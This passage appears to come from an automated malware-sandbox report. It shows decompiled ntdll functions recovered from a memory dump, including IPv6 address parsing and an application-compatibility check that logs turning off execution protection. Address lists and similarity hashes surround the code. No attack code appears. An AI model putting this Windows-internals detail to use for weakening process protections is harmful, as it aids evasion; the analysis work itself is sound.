							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                    0x020613d5
                                                                                                                                                    0x020613d9
                                                                                                                                                    0x020613dc
                                                                                                                                                    0x020613de
                                                                                                                                                    0x020613e1
                                                                                                                                                    0x020613e8
                                                                                                                                                    0x020613ee
                                                                                                                                                    0x0208e8fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e921
                                                                                                                                                    0x0208e921
                                                                                                                                                    0x0208e928
                                                                                                                                                    0x0208e982
                                                                                                                                                    0x0208e98a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e99a
                                                                                                                                                    0x0208e99e
                                                                                                                                                    0x0208e9a3
                                                                                                                                                    0x0208e9a8
                                                                                                                                                    0x0208e9b9
                                                                                                                                                    0x0208e978
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e978
                                                                                                                                                    0x0208e98a
                                                                                                                                                    0x0208e92a
                                                                                                                                                    0x0208e931
                                                                                                                                                    0x0208e944
                                                                                                                                                    0x0208e944
                                                                                                                                                    0x0208e950
                                                                                                                                                    0x0208e954
                                                                                                                                                    0x0208e959
                                                                                                                                                    0x0208e95e
                                                                                                                                                    0x0208e963
                                                                                                                                                    0x0208e970
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e975
                                                                                                                                                    0x0208e93b
                                                                                                                                                    0x0208e980
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e980
                                                                                                                                                    0x0208e942
                                                                                                                                                    0x0208e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208e942
                                                                                                                                                    0x020613f4
                                                                                                                                                    0x020613f4
                                                                                                                                                    0x020613f9
                                                                                                                                                    0x020613fc
                                                                                                                                                    0x020613ff
                                                                                                                                                    0x02061406
                                                                                                                                                    0x0208e9cc
                                                                                                                                                    0x0208e9d2
                                                                                                                                                    0x0208e9d2
                                                                                                                                                    0x0208e9cc
                                                                                                                                                    0x0206140c
                                                                                                                                                    0x02061411
                                                                                                                                                    0x02061431
                                                                                                                                                    0x0206143a
                                                                                                                                                    0x0206143c
                                                                                                                                                    0x0206143f
                                                                                                                                                    0x0206143f
                                                                                                                                                    0x02061442
                                                                                                                                                    0x02061447
                                                                                                                                                    0x020614a8
                                                                                                                                                    0x020614ac
                                                                                                                                                    0x0208e9e2
                                                                                                                                                    0x0208e9e7
                                                                                                                                                    0x0208e9ec
                                                                                                                                                    0x0208ea05
                                                                                                                                                    0x0208ea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02061449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02061449
                                                                                                                                                    0x0206144c
                                                                                                                                                    0x02061459
                                                                                                                                                    0x02061462
                                                                                                                                                    0x02061469
                                                                                                                                                    0x0206146a
                                                                                                                                                    0x02061470
                                                                                                                                                    0x02061473
                                                                                                                                                    0x02061476
                                                                                                                                                    0x02061476
                                                                                                                                                    0x02061490
                                                                                                                                                    0x02061495
                                                                                                                                                    0x0206138e
                                                                                                                                                    0x02061390
                                                                                                                                                    0x02061397
                                                                                                                                                    0x02061398
                                                                                                                                                    0x02061399
                                                                                                                                                    0x020613a1
                                                                                                                                                    0x020613a4
                                                                                                                                                    0x020613a4
                                                                                                                                                    0x02061498
                                                                                                                                                    0x0206149c
                                                                                                                                                    0x0206149f
                                                                                                                                                    0x020614a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020614a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020614a4
                                                                                                                                                    0x02061413
                                                                                                                                                    0x02061415
                                                                                                                                                    0x02061416
                                                                                                                                                    0x02061419
                                                                                                                                                    0x0206141c
                                                                                                                                                    0x02061422
                                                                                                                                                    0x020613b7
                                                                                                                                                    0x020613bc
                                                                                                                                                    0x020613bf
                                                                                                                                                    0x020613bf
                                                                                                                                                    0x020613c2
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061424
                                                                                                                                                    0x02061427
                                                                                                                                                    0x0206142b
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x0206142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0206141c
                                                                                                                                                    0x02061411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: 422f95ff58d7fb8ae0441e1243e7a8fba018922f0f282ec653285039f5ed58fc
                                                                                                                                                    • Instruction ID: bb3dcc8298e981899e0c27c56081247d976a1d9b3a5d19b11983939a6f79ade8
                                                                                                                                                    • Opcode Fuzzy Hash: 422f95ff58d7fb8ae0441e1243e7a8fba018922f0f282ec653285039f5ed58fc
                                                                                                                                                    • Instruction Fuzzy Hash: 0461F371D00765AADB25DF59C8849BFBBF6EF84300B18C16EE4DA47A40D774A640FB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02057EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E02057EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2102088; // 0x764d65b9
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02057F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02073F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0202DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2104218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02073F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02030D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02073F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02038375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02073F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0209E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02073F92();
					_t38 = 1;
					L2:
					return E0202E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                    0x02057f08
                                                                                                                                                    0x02057f0f
                                                                                                                                                    0x02057f12
                                                                                                                                                    0x02057f1b
                                                                                                                                                    0x02057f31
                                                                                                                                                    0x02073ead
                                                                                                                                                    0x02073eb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02073eba
                                                                                                                                                    0x02073ecd
                                                                                                                                                    0x02073ed2
                                                                                                                                                    0x02073ee1
                                                                                                                                                    0x02073ee7
                                                                                                                                                    0x02073eec
                                                                                                                                                    0x02073f12
                                                                                                                                                    0x02073f18
                                                                                                                                                    0x02073f1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02073f20
                                                                                                                                                    0x02073f26
                                                                                                                                                    0x02073f28
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02073f2e
                                                                                                                                                    0x02073f30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02073f3a
                                                                                                                                                    0x02073f3b
                                                                                                                                                    0x02073f53
                                                                                                                                                    0x02073f64
                                                                                                                                                    0x02073f69
                                                                                                                                                    0x02073f6c
                                                                                                                                                    0x02073f6d
                                                                                                                                                    0x02073f6f
                                                                                                                                                    0x0207e304
                                                                                                                                                    0x0207e30f
                                                                                                                                                    0x0207e315
                                                                                                                                                    0x0207e31e
                                                                                                                                                    0x0207e321
                                                                                                                                                    0x0207e327
                                                                                                                                                    0x0207e329
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0207e32f
                                                                                                                                                    0x0207e32f
                                                                                                                                                    0x0207e337
                                                                                                                                                    0x0207e33a
                                                                                                                                                    0x0207e33b
                                                                                                                                                    0x0207e33d
                                                                                                                                                    0x0207e33f
                                                                                                                                                    0x0207e341
                                                                                                                                                    0x0207e341
                                                                                                                                                    0x0207e34e
                                                                                                                                                    0x0207e353
                                                                                                                                                    0x0207e358
                                                                                                                                                    0x0207e35d
                                                                                                                                                    0x0207e35f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0207e365
                                                                                                                                                    0x0207e365
                                                                                                                                                    0x0207e368
                                                                                                                                                    0x0207e36e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0207e374
                                                                                                                                                    0x0207e32f
                                                                                                                                                    0x02073f75
                                                                                                                                                    0x02073f7a
                                                                                                                                                    0x02073f7c
                                                                                                                                                    0x02073f7e
                                                                                                                                                    0x02073f86
                                                                                                                                                    0x02057f39
                                                                                                                                                    0x02057f47
                                                                                                                                                    0x02057f47
                                                                                                                                                    0x02057f37
                                                                                                                                                    0x02057f37
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02073F12
                                                                                                                                                    Strings
                                                                                                                                                    • Execute=1, xrefs: 02073F5E
                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02073F75
                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02073F4A
                                                                                                                                                    • ExecuteOptions, xrefs: 02073F04
                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0207E2FB
                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02073EC4
                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0207E345
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                    • Opcode ID: f100b9f95a647f4b068791b412ef9f0bb2fa2eb5b19c43e5a65ffde01c6fa247
                                                                                                                                                    • Instruction ID: 86ecf0a5442cf08af1024848a7bf6a3681d0435d1f5377384c5007141d46aab4
                                                                                                                                                    • Opcode Fuzzy Hash: f100b9f95a647f4b068791b412ef9f0bb2fa2eb5b19c43e5a65ffde01c6fa247
                                                                                                                                                    • Instruction Fuzzy Hash: 5741A971A8032C7EEB21DA94DCC9FDBB3BDAB14704F0004A9A505E6190E770AA45BF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02060B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E02060B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02038980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0202DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02060CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02060CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020606BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020606BA(_t135, _t178) == 0 || E02060A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02060CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02060CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020606BA(_t124, _t142) == 0 || E02060A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                    0x02060b21
                                                                                                                                                    0x02060b24
                                                                                                                                                    0x02060b27
                                                                                                                                                    0x02060b2a
                                                                                                                                                    0x02060b2d
                                                                                                                                                    0x02060b30
                                                                                                                                                    0x02060b33
                                                                                                                                                    0x02060b36
                                                                                                                                                    0x02060b39
                                                                                                                                                    0x02060b3e
                                                                                                                                                    0x02060c65
                                                                                                                                                    0x02060c68
                                                                                                                                                    0x02060c6a
                                                                                                                                                    0x02060c6f
                                                                                                                                                    0x0208eb42
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb48
                                                                                                                                                    0x0208eb48
                                                                                                                                                    0x02060c75
                                                                                                                                                    0x02060c7a
                                                                                                                                                    0x0208eb54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb5a
                                                                                                                                                    0x02060c80
                                                                                                                                                    0x02060c84
                                                                                                                                                    0x0208eb98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eba6
                                                                                                                                                    0x02060cb8
                                                                                                                                                    0x02060cba
                                                                                                                                                    0x02060cd3
                                                                                                                                                    0x02060cda
                                                                                                                                                    0x02060ce4
                                                                                                                                                    0x02060ce9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060cec
                                                                                                                                                    0x02060c8c
                                                                                                                                                    0x0208eb63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb70
                                                                                                                                                    0x0208eb75
                                                                                                                                                    0x0208eb7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb8c
                                                                                                                                                    0x02060c96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060ca2
                                                                                                                                                    0x02060cac
                                                                                                                                                    0x02060cb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b44
                                                                                                                                                    0x02060b47
                                                                                                                                                    0x02060b49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b4f
                                                                                                                                                    0x02060b50
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b56
                                                                                                                                                    0x02060b62
                                                                                                                                                    0x02060b7c
                                                                                                                                                    0x02060bac
                                                                                                                                                    0x02060a0f
                                                                                                                                                    0x0208eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eac4
                                                                                                                                                    0x0208eac4
                                                                                                                                                    0x02060bd0
                                                                                                                                                    0x02060bd0
                                                                                                                                                    0x02060bd4
                                                                                                                                                    0x02060bd9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bdb
                                                                                                                                                    0x02060be0
                                                                                                                                                    0x0208eb0e
                                                                                                                                                    0x02060a1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060a1a
                                                                                                                                                    0x0208eb1a
                                                                                                                                                    0x0208eb1f
                                                                                                                                                    0x0208eb27
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb36
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb36
                                                                                                                                                    0x02060bea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bf6
                                                                                                                                                    0x02060c00
                                                                                                                                                    0x02060c03
                                                                                                                                                    0x02060c0b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c0b
                                                                                                                                                    0x0208eaaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060a15
                                                                                                                                                    0x02060bb6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bc6
                                                                                                                                                    0x02060bc6
                                                                                                                                                    0x02060bcb
                                                                                                                                                    0x02060c15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c1d
                                                                                                                                                    0x02060c20
                                                                                                                                                    0x02060c21
                                                                                                                                                    0x02060c24
                                                                                                                                                    0x02060c24
                                                                                                                                                    0x02060c26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c26
                                                                                                                                                    0x02060bcd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060bcd
                                                                                                                                                    0x02060b89
                                                                                                                                                    0x02060b89
                                                                                                                                                    0x02060b90
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b96
                                                                                                                                                    0x02060a04
                                                                                                                                                    0x02060a04
                                                                                                                                                    0x02060b9a
                                                                                                                                                    0x02060b9a
                                                                                                                                                    0x02060b9b
                                                                                                                                                    0x02060b9f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060ba5
                                                                                                                                                    0x02060ac7
                                                                                                                                                    0x02060aca
                                                                                                                                                    0x0208eacf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eade
                                                                                                                                                    0x0208eade
                                                                                                                                                    0x0208eae3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eaf3
                                                                                                                                                    0x0208eaf6
                                                                                                                                                    0x0208eaf7
                                                                                                                                                    0x0208eafe
                                                                                                                                                    0x0208eb01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eb01
                                                                                                                                                    0x0208eacf
                                                                                                                                                    0x02060ad0
                                                                                                                                                    0x02060ad4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060ada
                                                                                                                                                    0x02060ae6
                                                                                                                                                    0x02060c34
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c47
                                                                                                                                                    0x02060c49
                                                                                                                                                    0x02060c4a
                                                                                                                                                    0x02060c4e
                                                                                                                                                    0x02060c51
                                                                                                                                                    0x02060c54
                                                                                                                                                    0x02060c57
                                                                                                                                                    0x02060c5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060c60
                                                                                                                                                    0x02060afb
                                                                                                                                                    0x02060afe
                                                                                                                                                    0x02060b02
                                                                                                                                                    0x02060b05
                                                                                                                                                    0x02060b08
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060b08
                                                                                                                                                    0x02060ae6
                                                                                                                                                    0x02060b44
                                                                                                                                                    0x020609f8
                                                                                                                                                    0x020609f8
                                                                                                                                                    0x020609f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eaa0
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction ID: 1c8e0551da3dacb68559ca800a60273664f51ba42bc36cafc971b400e1b3e4dd
                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                    • Instruction Fuzzy Hash: EAA1AD71D8030AEECF25DF64C8487BEBBB7BF05318F24846AD842A7281D7319649EB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02060554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                    			E02060554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
